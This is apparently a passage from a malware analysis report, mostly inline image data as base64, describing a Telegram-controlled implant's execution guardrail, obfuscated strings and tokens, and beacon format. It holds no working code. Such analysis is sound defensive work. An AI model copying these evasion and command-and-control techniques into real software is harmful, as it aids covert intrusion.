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)\n\n_Figure 1: Execution Guardrail_\n\nThreat actors may be attempting to thwart simple analysis by not passing \u201cPlatypus\u201d on the command line. \n\n##### **_String obfuscation _**\n\nInternal strings and new Telegram tokens are stored obfuscated with a custom alphabet and Base64-encoded. A decryption script is included in Appendix B.\n\n#### **Communications **\n\n##### **_Beacon Format _**\n\nBefore listening for tasking using CommandHandler objects from the python`-telegram-bot `module, a beacon is generated manually using the standard `requests` library:\n\n![](image/png;base64,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